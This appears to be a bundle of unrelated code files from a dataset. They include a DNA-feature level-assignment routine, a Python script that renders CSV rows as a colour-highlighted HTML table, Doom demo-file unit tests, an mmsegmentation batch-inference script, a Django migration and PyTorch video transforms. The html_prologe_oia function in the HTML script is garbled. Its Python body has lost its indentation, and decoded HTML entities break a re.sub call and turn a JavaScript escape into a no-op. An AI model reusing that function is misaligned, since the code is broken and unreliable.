        A list of hashable objects forming the vertex set.
    edges
        Pairs [(n1, n2), ...]; each pair is recorded as a mutual
        neighbor link between n1 and n2.
    """

    def __init__(self, nodes, edges):
        self.nodes = nodes
        self.neighbors = {node: [] for node in nodes}
        for left, right in edges:
            self.neighbors[left].append(right)
            self.neighbors[right].append(left)
def compute_features_levels(features):
    """Compute the vertical levels on which the features should be displayed
    in order to avoid collisions.

    `features` must be a list of `dna_features_viewer.GraphicFeature`.

    The method used is basically a graph coloring:

    - The nodes of the graph are features and they will be colored with a level.
    - Two nodes are neighbors if and only if their features's locations overlap.
    - Levels are attributed to nodes iteratively starting with the nodes
      corresponding to the largest features.
    - A node receives the lowest level (starting at 0) that is not already
      the level of one of its neighbors.

    Returns a dict mapping each feature to its assigned level (a float,
    since levels advance in 0.5 steps).
    """
    # Build the overlap graph: one edge per overlapping feature pair.
    edges = [
        (f1, f2)
        for f1, f2 in itertools.combinations(features, 2)
        if f1.overlaps_with(f2)
    ]
    graph = Graph(features, edges)
    # Features may pin themselves to a level via data["fixed_level"].
    levels = {n: n.data.get("fixed_level", None) for n in graph.nodes}

    def collision(node, level):
        """Return whether the node placed at base_level collides with its
        neighbors in the graph."""
        line_factor = 0.5
        # Features spanning several text lines need proportionally more room.
        nlines = node.data.get("nlines", 1)
        for neighbor in graph.neighbors[node]:
            neighbor_level = levels[neighbor]
            if neighbor_level is None:
                # Neighbor not placed yet; it will avoid us when placed.
                continue
            neighbor_lines = neighbor.data.get("nlines", 1)
            min_distance = line_factor * (nlines + neighbor_lines)
            if abs(level - neighbor_level) < min_distance:
                return True
        return False

    # Greedy coloring: largest features first, lowest non-colliding level wins.
    for node in sorted(graph.nodes, key=lambda f: -f.length):
        if levels[node] is None:
            level = 0
            while collision(node, level):
                level += 0.5
            levels[node] = level
    return levels
| StarcoderdataPython |
1701587 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Name: csv_print_html_oia.py
# Description:
#
# Author: m.akei
# Copyright: (c) 2021 by m.na.akei
# Time-stamp: <2021-04-25 16:33:53>
# Licence:
# ----------------------------------------------------------------------
import argparse
import textwrap
import sys
from pathlib import Path
import re
import html
import minify_html
import json
import pandas as pd
VERSION = 1.0
OIA_HANDLER_JS = "oia_handler.js"
def init():
    """Parse command-line arguments for csv_print_html_oia and return the
    populated argparse namespace."""
    arg_parser = argparse.ArgumentParser(description="print html table made of csv with estimation",
                                         formatter_class=argparse.RawDescriptionHelpFormatter,
                                         epilog=textwrap.dedent('''
remark:
  For '--part_color', is you want to use comma(,) an colon(:) in word, then those must be escaped by "\".
example:
  cat test3.csv
  IDX,B,C,O,I,A
  1,A,Sample1,Observation1:this is a pen,Investigation1:Atre you there?,Action1: nothing to do
  2,B,Sample2,Observation2:this is a pen,Investigation2:Atre you there?,Action2: nothing to do
  3,C,Sample3,Observation3:this is a pen,Investigation2:Atre you there?,Action3: nothing to do
  csv_print_html_oia.py --columns=IDX,B,C --part_color='this:red' test3.csv O I A > test.html
  csv_print_html_oia.py --columns=IDX,B,C --part_color='バリ島:red,米国:green,潜水艦:blue,海軍:black' --search_on_html test3.csv O I A > test.html
'''))

    arg_parser.add_argument('-v', '--version', action='version', version='%(prog)s {}'.format(VERSION))
    # Presentation options.
    arg_parser.add_argument("--title", dest="TITLE", help="Title of table", type=str, metavar='TITLE', default=None)
    arg_parser.add_argument("--columns",
                            dest="COLUMNS",
                            help="names of addtional columns",
                            type=str,
                            metavar='COLUMNS[,COLUMNS...]',
                            default=None)
    # Highlighting: WORD:CSS_COLOR pairs, comma-separated.
    arg_parser.add_argument("--part_color",
                            dest="PCOLORS",
                            help="part color for string, color code is one in css codes.",
                            type=str,
                            metavar='STRING:COLOR[,STRING:COLOR...]',
                            default=None)
    arg_parser.add_argument("--search_on_html", dest="SHTML", help="searching on html is enable", action="store_true", default=False)
    arg_parser.add_argument("--output_file", dest="OUTPUT", help="path of output file", type=str, metavar='FILE', default=sys.stdout)
    arg_parser.add_argument("--minify", dest="MINIFY", help="minifing html", action="store_true", default=False)
    # Positional arguments: the CSV and the O/I/A column names.
    arg_parser.add_argument('csv_file', metavar='CSV_FILE', help='file to read, if empty, stdin is used')
    arg_parser.add_argument('oia_columns', metavar='COLUMNS', nargs="+", help="colum names of Observation/Investigation/Action")

    args = arg_parser.parse_args()
    return args
def html_prologe_oia(align_center=True, width=None, word_colors="", search_on_html=False, progress_bar=False, title=""):
table_css_2 = ""
if align_center:
table_css_2 += "margin-left: auto;margin-right: auto;"
if width is not None:
table_css_2 += "width:{};".format(width)
# text-shadow: 0.1em 0.1em 0.6em gold;
table_css = '''
<style type="text/css">
/* */
body {{
background: -webkit-linear-gradient(left, #25c481, #25b7c4);
background: linear-gradient(to right, #25c481, #25b7c4);
}}
h2.title {{
text-align:center;
margin-bottom: 0pt;
}}
form.word_search {{
position: fixed;
top: 1.5em;
visibility:hidden;
z-index: 100;
}}
span.word_view_span {{
font-weight:bold;
background:#EEEEEE;
box-shadow: 0.0625em 0.0625em 0.0625em 0.0625em rgba(0,0,0,0.4);
border-radius: 0.25em;
padding-left:0.2em;
padding-right:0.2em;
margin-right:0.2em;
}}
fieldset {{
border: 2px solid #ccc;
border-radius: 5px;
padding: 25px;
margin-top: 20px;
background-color: #e0ffff;
box-shadow: 5px 5px 5px rgba(0,0,0,0.2);
}}
legend {{
border: 1px solid #ccc;
border-bottom: 0;
border-radius: 5px 5px 0 0;
padding: 8px 18px 0;
position:relative;
top: -14px;
background-color: #e0ffff;
}}
td.dblclicable:hover {{
font-weight:bold;
font-size:110%;
}}
table {{
{}
box-shadow: 0 0 20px rgba(0, 0, 0, 0.15);
}}
table caption {{
font-size:large; font-weight: bold;
}}
th {{
/* background-color: #6495ed; */
background-color: #009879;
padding:6px;
}}
thead tr th {{
border-bottom: solid 1px;
color: #ffffff;
}}
td {{
padding:6pt;
}}
/* Table CSS: Creating beautiful HTML tables with CSS - DEV Community https://dev.to/dcodeyt/creating-beautiful-html-tables-with-css-428l */
tbody tr {{
border-bottom: 1px solid #dddddd;
background-color: #ffffff;
}}
tbody tr:last-of-type {{
border-bottom: 2px solid #009879;
}}
/* CSSのposition: stickyでテーブルのヘッダー行・列を固定する - Qiita https://qiita.com/orangain/items/6268b6528ab33b27f8f2 */
table.sticky_table thead th {{
position: -webkit-sticky;
position: sticky;
top: 0;
z-index: 1;
}}
table.sticky_table th:first-child {{
position: -webkit-sticky;
position: sticky;
left: 0;
}}
table.sticky_table thead th:first-child {{
z-index: 2;
}}
</style>
'''.format(table_css_2)
text = """
<?xml version="1.0" encoding="utf-8"?>
<html>
<!-- made by csv_print_html_oia.py -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Expires" content="0">
{}
</head>
<body>
""".format(table_css)
if title is not None and len(title) > 0:
text += f'<h2 class="title">{title}</h2>'
word_colors = re.sub(r"\"", """, word_colors)
if search_on_html:
text += """
<script type="text/javascript" src="{}"></script>
<script type="text/javascript">
// クリック時に特殊キーを検知させる http://www.shurey.com/js/samples/1_tips16.html
KEY_SHIFT = false;
KEY_CTL = false;
KEY_ALT = false;
KEY_META = false;
document.onkeydown = function(event) {{
var key_event = event|| window.event;
KEY_SHIFT = (key_event.shiftKey);
KEY_CTL = (key_event.ctrlKey);
KEY_ATL = (key_event.altKey);
KEY_META = (key_event.metaKey);
}}
document.onkeyup = function(event) {{
var key_event = event|| window.event;
KEY_SHIFT = (key_event.shiftKey);
KEY_CTL = (key_event.ctrlKey);
KEY_ATL = (key_event.altKey);
KEY_META = (key_event.metaKey);
}}
function oia_dblclick_from_td_0(val_dic){{
if(typeof(oia_dblclick_from_td) == "function"){{
oia_dblclick_from_td(val_dic);
}} else {{
alert("リンク先が設定されていません");
}}
}}
</script>
<script type="text/javascript">
window.onload=function(){{
if( window.location.hash.length > 0){{
window.scroll(0,window.scrollY-32);
}}
if( window.location.search.length > 0){{
let search_string=decodeURI(window.location.search.substring(1));
window.find(search_string,false,false,true,false,true);
}}
show_hide_progress_bar(false);
}}
function show_hide_progress_bar(onoff){{
let prg_elm= document.getElementById("progfs");
if( prg_elm){{
if(onoff){{
prg_elm.style.visibility="visible";
}} else {{
prg_elm.style.visibility="hidden";
}}
}}
}}
function show_nrec_record(nrec,onoff){{
let tr_objs= document.evaluate("/html//tr[@nrec=\\""+nrec+"\\"]",document,null,XPathResult.ANY_TYPE, null);
let tr_node= tr_objs.iterateNext();
while(tr_node){{
if( onoff ){{
tr_node.style.display="";
}} else {{
tr_node.style.display="none";
}}
tr_node= tr_objs.iterateNext();
}}
}}
function show_nohits_record(obj){{
if( obj.checked){{
onoff=true;
}} else {{
onoff=false;
}}
let xp_results_0= document.evaluate("/html//td[@hits_status=\\"1\\"]",document,null,XPathResult.ANY_TYPE, null);
let node= xp_results_0.iterateNext();
let nrec_hits=[];
while( node){{
let nrec= node.getAttribute("nrec");
nrec_hits.push(nrec);
show_nrec_record(nrec,true);
node= xp_results_0.iterateNext();
}}
show_nrec_record(onoff);
let xp_results= document.evaluate("/html//td[@hits_status=\\"0\\"]",document,null,XPathResult.ANY_TYPE, null);
node= xp_results.iterateNext();
while( node){{
let nrec= node.getAttribute("nrec");
if( nrec_hits.indexOf(nrec) != -1){{
node= xp_results.iterateNext();
continue;
}}
show_nrec_record(nrec, onoff);
node= xp_results.iterateNext();
}}
}}
function word_color(word,color_code){{
var nodes= document.getElementsByTagName("td");
let count=0;
for(var i=0; i< nodes.length; i++){{
// let wre= word.replace(/[\\^$.*+?()\\[\\]{{}}|]/g, '\\\\$&');
let wre= word.replace(/</g, '<');
wre= wre.replace(/>/g, '>');
let re= new RegExp('(?<!<[^>]*)('+wre+')','gi');
nodes[i].innerHTML=nodes[i].innerHTML.replace(re,'<span class="word_view_span" style="color:'+color_code+'">$1</span>');
count_0= (nodes[i].innerHTML.match(re) ||[]).length;
if( count_0 > 0){{
nodes[i].setAttribute("hits_status","1");
}} else {{
nodes[i].setAttribute("hits_status","0");
}}
count= count+ count_0;
}}
return count;
}}
function word_color_reset(){{
var nodes= document.getElementsByTagName("td");
for(var i=0; i< nodes.length; i++){{
span_head='<span class="word_view_span"'
let re = new RegExp(span_head+' style="color:[^\"]+">([^<]+?)</span>','gi');
while( nodes[i].innerHTML.indexOf(span_head) != -1){{
nodes[i].innerHTML=nodes[i].innerHTML.replace(re,'$1');
nodes[i].setAttribute("hits_status","0");
}}
}}
}}
function emphasis_words(obj){{
let wc_defs= obj.value;
let re_s= new RegExp(/(?<!\\\\)\s*,\s*/,'g')
obj.value= obj.value.replace(re_s,", ");
let re= /\s*(?<!\\\\),\s*/;
let cvs= wc_defs.split(re);
let word_counts={{}};
word_color_reset();
show_hide_progress_bar(true);
cvs.forEach(
function (val ){{
if(val==""){{
return;
}}
let re= /\s*(?<!\\\\):\s*/;
cvs=val.split(re);
var w="";
var c="";
if( cvs.length < 2){{
// alert("??error:word_view:invalid definition: '"+val+"'");
w= cvs[0];
c="red";
}} else {{
let re= new RegExp('\\\\\\\\([,:])','g');
w= cvs[0];
w=w.replace(re,'$1');
c= cvs[1];
}}
if(!c.match(/^[a-zA-Z0-9#]+$/)){{
alert("??error:word_view:invalid color code: '"+c+"'");
return;
}}
try{{
word_counts[String(w)]=word_color(w,c);
}} catch(e){{
alert("??error:word_view:invalid definition: '"+val+"' :"+e);
}}
}}
);
let sh_obj= document.getElementById("showhide_hits");
show_nohits_record(sh_obj);
let swr= document.getElementById('search_word_result');
swr.innerHTML="検索結果:"+JSON.stringify(word_counts);
show_hide_progress_bar(false);
}}
function show_word_search(){{
let fobj= document.getElementById("word_search");
sty_visibility=fobj.style.visibility;
if( sty_visibility == "" || sty_visibility == "hidden"){{
fobj.style.visibility="visible";
}} else {{
fobj.style.visibility="hidden";
}}
}}
</script>
<form action="" onsubmit="return false;" class="word_search" id="word_search" ondblclick="show_word_search();">
<fieldset style="padding-top:0pt;padding-bottom:0pt;">
<legend>語句色付け定義</legend>
<input type="text" size="138" placeholder="Enter word:color[,word:color...]" onchange="emphasis_words(this)" value="{}"><br/>
<input type="checkbox" id="showhide_hits" name="showhide_hits" checked onchange="show_nohits_record(this)"/>
<label for="showhide_hist" style="font-size:0.5em;">全レコード表示</label><br/>
<span style="font-size:0.5em;">
語句の色付け定義を"語句:色"で入力。複数入力する場合は半角カンマで区切って入力、語句には正規表現を利用可能<br>
語句だけ指定した場合は、赤色が指定されたものとして処理される。
語句に半角カンマ、コロンを含める場合はBackslash(\\)によりエスケープする必要がある。
また、<>は検索時に&lt;&gt;として検索されることに注意。<br>
Ex: ABC:red,DEF\,GHI:blue,\d+人:black
</span><br>
<span style="font-size:small;" id="search_word_result"></span>
</fieldset>
</form>
""".format(OIA_HANDLER_JS, word_colors)
else:
text += f'<input value="{word_colors}" style="display:none" />\n'
if progress_bar:
text += """
<fieldset id="progfs"
style="padding-top:0pt;padding-bottom:0pt;position:fixed;height:2em;top:1em;right:10;background-color:white;z-index:100;padding:0.5em;background-color: #e0ffff;">
<label for="progbar" style="font-size:0.5em;">しばらくお待ちください</label>
<progress id="progbar" style="width:20em;height:1em;"></progress>
</fieldset>
"""
return text
def html_epiloge(datatable=False):
    """Return the closing HTML fragment, optionally preceded by a DataTables
    initializer.

    :param datatable: when True, prepend a script that turns every <table>
        into a scrollable jQuery DataTable (paging and length menu disabled).
    :returns: HTML string that closes <body> and <html>.
    """
    # DataTables example - Scroll - horizontal and vertical
    # https://datatables.net/examples/basic_init/scroll_xy.html
    pieces = []
    if datatable:
        pieces.append('''
<script type="text/javascript">$(document).ready(function(){$('table').DataTable({
lengthChange: false,
scrollX: true,
scrollY: "80vh",
paging: false
});});</script>
''')
    pieces.append('''
</body>
</html>
''')
    return "".join(pieces)
def part_color(pcolors, text):
    """Wrap every match of each "word:color" definition in a colored <span>.

    Each entry of ``pcolors`` is "word:color" (":" may be escaped as "\\:");
    the word part is treated as a regular expression. Entries without a color
    default to red.

    :param pcolors: list of "word[:color]" definition strings.
    :param text: (HTML-escaped) text to decorate.
    :returns: (decorated text, dict mapping matched word -> match count).
    """
    hit_words = {}
    for pc in pcolors:
        # Split on the first unescaped colon; default the color to red.
        parts = re.split(r"(?<!\\):", pc)
        if len(parts) < 2:
            parts.append("red")
        word = parts[0]
        word = re.sub(r"\\([,:])", r"\1", word)  # unescape "\," and "\:"
        word = word.strip("'\"")
        raw_word = word
        # The text was HTML-escaped, so escape the pattern the same way
        # ("<" must match "&lt;", etc.).
        word = html.escape(str(word))
        pattern = "(" + word + ")"
        color = parts[1]
        span = f'<span class="word_view_span" style="color:{color};">\\1</span>'
        # FIX: the old code counted hits with text.count(word), which is wrong
        # when the word is a regex (it counted literal occurrences of the
        # pattern text, not matches). re.subn reports the real match count.
        text, n_subs = re.subn(pattern, span, text)
        if n_subs:
            hit_words[raw_word] = n_subs
    return text, hit_words
def make_table(df, columns, oia_columns, pcolors, space_width="40pm"):
    """Render ``df`` as an HTML table: ``columns`` become plain cells and the
    ``oia_columns`` become stacked Observation/Investigation/Action sub-rows.

    Returns (html_string, output_df), where output_df is a copy of ``df``
    extended with a "hits_words" column recording the highlight hits found by
    ``part_color`` for each record.

    NOTE(review): the default ``space_width`` "40pm" is not a valid CSS unit —
    presumably "40px" (or "4em") was intended; confirm before changing.
    """
    output_df = df.copy()
    output_df["hits_words"] = ""
    html_str = '\n<table class="sticky_table display nowrap" style="width:100%;">\n'
    html_str += '<thead ondblclick="show_word_search();">\n'
    n_oia = len(oia_columns)
    for c in columns:
        html_str += f"<th>{c}</th>\n"
    # One extra header cell spans all OIA sub-columns plus the text column.
    html_str += f'<th colspan="{n_oia+1}">Observation/Investigation/Action</th>\n'
    html_str += '</thead>\n<tbody>\n'
    # NOTE(review): fillna(inplace=True) mutates the caller's DataFrame —
    # a side effect on the `df` argument; confirm callers tolerate it.
    df.fillna("", inplace=True)
    for ir, row in df.iterrows():
        # Zebra striping for even record numbers.
        if ir % 2 == 0:
            tr_sty = 'style="background-color:#eeffee;"'
        else:
            tr_sty = ""
        html_str += f"<tr {tr_sty} nrec=\"{ir}\" id=\"rid_{ir}\">\n"
        # When every OIA cell is empty, the plain cells span only one row.
        check_empty = all([v == "" for v in row[oia_columns]])
        n_oia_h = 1 if check_empty else n_oia
        td_columns = {"nrec": ir}
        html_str_0 = ""
        for c in columns:
            v = html.escape(str(row[c]))
            td_columns[c] = v
            if pcolors is not None and len(pcolors) > 0:
                v, hw = part_color(pcolors, v)
            v = " " if v == "" else v
            # Placeholder call; the real JSON payload is substituted below
            # once all of this record's column values have been collected.
            html_str_0 += f"<td nowrap=1 rowspan='{n_oia_h}' ondblclick='oia_dblclick_from_td_0()' class='dblclicable'>{v}</td>\n"
        html_str_0 = re.sub(r"oia_dblclick_from_td_0\(\)", f"oia_dblclick_from_td_0({json.dumps(td_columns, ensure_ascii=False)})",
                            html_str_0)
        html_str += html_str_0
        if not check_empty:
            hits_words = {}
            # Each OIA column becomes its own indented sub-row.
            for ic, c in enumerate(oia_columns):
                v = html.escape(str(row[c]))
                if pcolors is not None and len(pcolors) > 0:
                    v, hw = part_color(pcolors, v)
                    hits_words.update(hw)
                v = " " if v == "" else v
                hits_status = 1 if len(hits_words) > 0 else 0
                # NOTE(review): colspan uses a hard-coded 4 — this looks like
                # it assumes len(oia_columns) == 4; confirm against callers.
                html_str += (f'<td width="{space_width}"></td>' *
                             ic) + f'<td colspan="{4-ic}" nrec="{ir}" hits_status="{hits_status}">{v}</td>\n'
                if ic < len(oia_columns) - 1:
                    html_str += f'</tr>\n<tr {tr_sty} nrec={ir}>\n'
            output_df.at[ir, "hits_words"] = output_df.at[ir, "hits_words"] + str(hits_words)
        else:
            html_str += '<td></td>' * n_oia
        html_str += "</tr>\n"
    html_str += "</tbody>\n</table>\n"
    return html_str, output_df
def make_oia_handler_template(columns, output_js):
    """Write a starter JavaScript double-click handler to ``output_js``.

    The generated file defines ``oia_dblclick_from_td(val_dic)``, which the
    HTML produced by this script calls on cell double-click. If the file
    already exists it is left untouched (so user edits survive reruns).

    :param columns: column names documented in the generated stub.
    :param output_js: path of the JavaScript file to create.
    """
    if Path(output_js).exists():
        print(f"#warn:csv_print_html_oia: {output_js} already exists.", file=sys.stderr)
        return
    js_str = f"""
// -*- coding:utf-8 mode:javascript -*-
// File: oia_handler.js
function oia_dblclick_from_td(val_dic){{
// index: 'nrec' and {columns}
// special key(boolean):
// KEY_SHIFT, KEY_CTL, KEY_ALT, KEY_META
// enter codes
console.log(val_dic, KEY_SHIFT);
alert("{output_js}を編集してください。");
// let html_url="test.html";
// let nrec= val_dic["nrec"]; // record number in csv
// let id_in_html="rid_"+nrec;
// let url=html_url+"#"+id_in_html;
// window.open(url,"__blank");
}}
"""
    # FIX: the stub contains Japanese text; without an explicit encoding the
    # write fails (or mis-encodes) on platforms whose locale is not UTF-8.
    with open(output_js, "w", encoding="utf-8") as f:
        print(js_str, file=f)
    print(f"%inf:csv_print_html_oia: {output_js} was created.", file=sys.stderr)
if __name__ == "__main__":
    # Command-line driver: read a CSV, render it as an interactive OIA HTML
    # table, and emit a companion JS handler stub plus a hits-report CSV.
    output_js = OIA_HANDLER_JS
    args = init()
    csv_file = args.csv_file
    output_file = args.OUTPUT
    oia_columns = args.oia_columns
    title = args.TITLE
    columns_s = args.COLUMNS
    pcolors_s = args.PCOLORS
    search_on_html = args.SHTML
    html_minify = args.MINIFY
    # Parse "word:color,word:color" highlight definitions ("\," escapes a
    # literal comma inside a word).
    pcolors = None
    if pcolors_s is not None:
        pcolors = re.split(r"\s*(?<!\\),\s*", pcolors_s)
        print(f"%inf:csv_print_html:part colors: {pcolors}", file=sys.stderr)
    else:
        pcolors_s = ""
    columns = []
    if columns_s is not None:
        columns = re.split(r"\s*,\s*", columns_s)
    if csv_file == "-":
        csv_file = sys.stdin
        output_csv_file = "output_oia.csv"
    else:
        output_csv_file = Path(csv_file).stem + "_output.csv"
    # FIX: the generated HTML declares charset=utf-8, so the output file must
    # be written as UTF-8 regardless of the locale; also remember whether we
    # opened the handle so it can be closed afterwards (it used to leak).
    opened_here = output_file != sys.stdout
    if opened_here:
        output_file = open(output_file, "w", encoding="utf-8")
    csv_df = pd.read_csv(csv_file, dtype='object')
    # Show the "please wait" progress bar only for large tables.
    progress_bar = len(csv_df) > 500
    html_str = html_prologe_oia(width=None, word_colors=pcolors_s, search_on_html=search_on_html, title=title, progress_bar=progress_bar)
    html_str += "<div id='tablecontainer'>"
    table_str, output_df = make_table(csv_df, columns, oia_columns, pcolors)
    html_str += table_str
    html_str += "</div>"
    html_str += html_epiloge()
    if html_minify:
        try:
            html_str = minify_html.minify(html_str, minify_js=True, minify_css=True)
        except SyntaxError as e:
            mes = f'??error:csv_print_html_oia:{e}'
            print(mes, file=sys.stderr)
            sys.exit(1)
    print(html_str, file=output_file)
    if opened_here:
        output_file.close()
    if pcolors is not None:
        # Record which highlight words hit which records.
        output_df.to_csv(output_csv_file, index=False)
        print(f"%inf:csv_print_html: {output_csv_file} was created.", file=sys.stderr)
    make_oia_handler_template(columns, output_js)
| StarcoderdataPython |
154106 | import unittest
import run as lmpkit
# just some notes on prboom+ compat levels so I can't botch this
#
# test_01 - 3 - Doom Ultimate - Doom 1 - E1L1
# test_02 - 3 - Doom Ultimate - Doom 1 - E1L1
# test_03 - 3 - Doom Ultimate - Doom 1 - E1L1
# test_04 - 17 - PRBoom 6 - Doom 1 - E1L1
# test_05 - 16 - PRBoom 5 - Doom 1 - E1L1
#
# probably they hid this somewhere
# needs must locate when I get a chance
class TestLoads(unittest.TestCase):
    '''
    Just tests basic loading for files into framework.

    Each case passes as long as createDemoLumpFromFile() does not raise;
    nothing about the parsed lump is asserted.
    '''

    def test_01(self):
        # complevel 3 (Ultimate Doom), Doom 1 E1L1 — see notes above the class
        lmpkit.createDemoLumpFromFile("test_files/test_01.lmp")

    def test_02(self):
        # complevel 3 (Ultimate Doom), Doom 1 E1L1
        lmpkit.createDemoLumpFromFile("test_files/test_02.lmp")

    def test_03(self):
        # complevel 3 (Ultimate Doom), Doom 1 E1L1
        lmpkit.createDemoLumpFromFile("test_files/test_03.lmp")

    def test_04(self):
        # complevel 17 (PRBoom 6), Doom 1 E1L1
        lmpkit.createDemoLumpFromFile("test_files/test_04.lmp")

    def test_05(self):
        # complevel 16 (PRBoom 5), Doom 1 E1L1
        lmpkit.createDemoLumpFromFile("test_files/test_05.lmp")
class TestLoadedLengths(unittest.TestCase):
    '''
    Tests lengths of loaded files.

    NOTE(review): despite the name, no length is asserted yet — each case is
    currently identical to TestLoads. The expected tic counts reported by
    PrBoom+ are kept in the per-test comments; once the lump object's length
    accessor is known, turn these into real assertions.
    '''

    def test_01(self):
        # prboom says 1420 tics
        lmpkit.createDemoLumpFromFile("test_files/test_01.lmp")

    def test_02(self):
        # prboom says 2204 tics
        lmpkit.createDemoLumpFromFile("test_files/test_02.lmp")

    def test_03(self):
        # prboom says 694 tics
        lmpkit.createDemoLumpFromFile("test_files/test_03.lmp")

    def test_04(self):
        # prboom says ??? tics
        lmpkit.createDemoLumpFromFile("test_files/test_04.lmp")

    def test_05(self):
        # prboom says ??? tics
        lmpkit.createDemoLumpFromFile("test_files/test_05.lmp")
if __name__ == '__main__':
    # FIX: a dataset artifact ("| StarcoderdataPython |") was fused onto this
    # line, making it a syntax error; restore the plain test entry point.
    unittest.main()
class ZCItoolsException(Exception):
    """Base class for all zcit-tools errors.

    Catch this to handle any error raised by the package.
    """
    # FIX: a dataset artifact ("1695935 |") was fused onto the class line,
    # making it a syntax error; the class itself is unchanged.
class ZCItoolsValueError(ZCItoolsException):
    """Raised when a zcit-tools API receives an invalid value."""
| StarcoderdataPython |
3362302 | <gh_stars>0
import os
from mmseg.apis import init_segmentor, inference_segmentor, show_result_pyplot
from mmseg.core.evaluation import get_palette
from matplotlib import pyplot as plt
import mmcv
from collections import Counter
from PIL import Image
import numpy as np
from tqdm import tqdm

# Model definition and trained DNLNet weights (ADE20K config, fine-tuned).
config_file = r"D:\林彬\mmsegmentation-master\configs\dnlnet\dnl_r101-d8_512x512_160k_ade20k.py"
checkpoint_file = r"D:\林彬\mmsegmentation-master\tools\dnl_r101_yaogan_5\iter_160000.pth"
model = init_segmentor(config_file, checkpoint_file, device='cuda:1')

img_root = r'..\tools\data\test_jpg/jpg/'
save_mask_root = r"..\tools\data\DNLNetpre/"
# FIX: os.mkdir fails when the parent directory is missing and races when the
# directory appears between the check and the call; makedirs(exist_ok=True)
# covers both.
os.makedirs(save_mask_root, exist_ok=True)

img_names = os.listdir(img_root)
for img_name in tqdm(img_names):
    # Run single-image inference; inference_segmentor returns a list whose
    # first element is the predicted (H, W) label map.
    img = img_root + img_name
    result = inference_segmentor(model, img)[0]
    # Save the raw class indices as an 8-bit mask named after the input image.
    mask = Image.fromarray(np.uint8(result))
    mask.save(save_mask_root + img_name)
1624946 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated Django schema migration: reworks WaitOrderItem by
    # dropping the lookup/contact fields (find_id, if_phone, location,
    # status) and adding book-centric ones (book_id, may_return_time, title).
    # Operation order matters — do not reorder.

    dependencies = [
        ('library', '0013_auto_20170613_1705'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='waitorderitem',
            name='find_id',
        ),
        migrations.RemoveField(
            model_name='waitorderitem',
            name='if_phone',
        ),
        migrations.RemoveField(
            model_name='waitorderitem',
            name='location',
        ),
        migrations.RemoveField(
            model_name='waitorderitem',
            name='status',
        ),
        migrations.AddField(
            model_name='waitorderitem',
            name='book_id',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='waitorderitem',
            name='may_return_time',
            field=models.CharField(default=None, max_length=200),
        ),
        migrations.AddField(
            model_name='waitorderitem',
            name='title',
            field=models.TextField(default=None),
        ),
    ]
| StarcoderdataPython |
1761824 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import copy
import math
from typing import Tuple
import numpy as np
import torch
try:
import cv2
except ImportError:
_HAS_CV2 = False
else:
_HAS_CV2 = True
def uniform_temporal_subsample(
    x: torch.Tensor, num_samples: int, temporal_dim: int = -3
) -> torch.Tensor:
    """Select ``num_samples`` equispaced frames along ``temporal_dim``.

    When ``num_samples`` exceeds the temporal length, indices repeat
    (nearest-neighbor in index space).

    Args:
        x: video tensor with more than one dimension (any numeric dtype).
        num_samples: number of equispaced samples to keep (> 0).
        temporal_dim: which dimension is time.

    Returns:
        An ``x``-like tensor with the temporal dimension resampled.
    """
    length = x.shape[temporal_dim]
    assert num_samples > 0 and length > 0
    # Equispaced (possibly repeating) indices over [0, length - 1].
    picks = torch.linspace(0, length - 1, num_samples).clamp_(0, length - 1).long()
    return torch.index_select(x, temporal_dim, picks)
@torch.jit.ignore
def _interpolate_opencv(
    x: torch.Tensor, size: Tuple[int, int], interpolation: str
) -> torch.Tensor:
    """Spatially resample a (C, T, H, W) tensor via OpenCV.

    Args:
        x: input tensor to down/up sample.
        size: target (height, width).
        interpolation: one of `nearest`, `linear`, `bilinear`, `bicubic`.
    """
    if not _HAS_CV2:
        raise ImportError(
            "opencv is required to use opencv transforms. Please "
            "install with 'pip install opencv-python'."
        )
    cv2_modes = {
        "nearest": cv2.INTER_NEAREST,
        "linear": cv2.INTER_LINEAR,
        "bilinear": cv2.INTER_AREA,
        "bicubic": cv2.INTER_CUBIC,
    }
    assert interpolation in cv2_modes
    target_h, target_w = size
    # OpenCV works on HWC frames, so move channels last and iterate over time.
    frames = x.permute(1, 2, 3, 0).numpy()
    resized = np.stack(
        [
            # OpenCV's size argument is (width, height).
            cv2.resize(frame, (target_w, target_h), interpolation=cv2_modes[interpolation])
            for frame in frames
        ],
        axis=0,
    )
    return torch.from_numpy(np.ascontiguousarray(resized)).permute(3, 0, 1, 2)
def short_side_scale(
    x: torch.Tensor,
    size: int,
    interpolation: str = "bilinear",
    backend: str = "pytorch",
) -> torch.Tensor:
    """Scale the shorter spatial side of a (C, T, H, W) video to ``size``,
    scaling the longer side proportionally to keep the aspect ratio.

    Args:
        x: video tensor of shape (C, T, H, W) and dtype torch.float32.
        size: target length of the shorter side.
        interpolation: 'nearest' | 'linear' | 'bilinear' | 'bicubic' |
            'trilinear' | 'area'.
        backend: 'pytorch' (default) or 'opencv'. Note that opencv and
            pytorch can behave differently on linear interpolation in some
            versions.

    Returns:
        An x-like tensor with scaled spatial dims.
    """  # noqa
    assert len(x.shape) == 4
    assert x.dtype == torch.float32
    assert backend in ("pytorch", "opencv")
    c, t, h, w = x.shape
    if w < h:
        new_h = int(math.floor((float(h) / w) * size))
        new_w = size
    else:
        new_h = size
        new_w = int(math.floor((float(w) / h) * size))
    if backend == "pytorch":
        # FIX: `align_corners` is only accepted by the linear-family modes;
        # passing False together with 'nearest'/'area' raises ValueError in
        # PyTorch, so pass None (the default) for those modes instead.
        align_corners = (
            False
            if interpolation in ("linear", "bilinear", "bicubic", "trilinear")
            else None
        )
        return torch.nn.functional.interpolate(
            x, size=(new_h, new_w), mode=interpolation, align_corners=align_corners
        )
    elif backend == "opencv":
        return _interpolate_opencv(x, size=(new_h, new_w), interpolation=interpolation)
    else:
        raise NotImplementedError(f"{backend} backend not supported.")
def uniform_temporal_subsample_repeated(
    frames: torch.Tensor, frame_ratios: Tuple[int], temporal_dim: int = -3
) -> Tuple[torch.Tensor]:
    """Build one temporally-subsampled copy of ``frames`` per pathway.

    Each ratio ``r`` in ``frame_ratios`` yields a tensor holding ``T // r``
    equispaced frames, where ``T`` is the length of ``temporal_dim``; every
    pathway gets its own copy.

    Args:
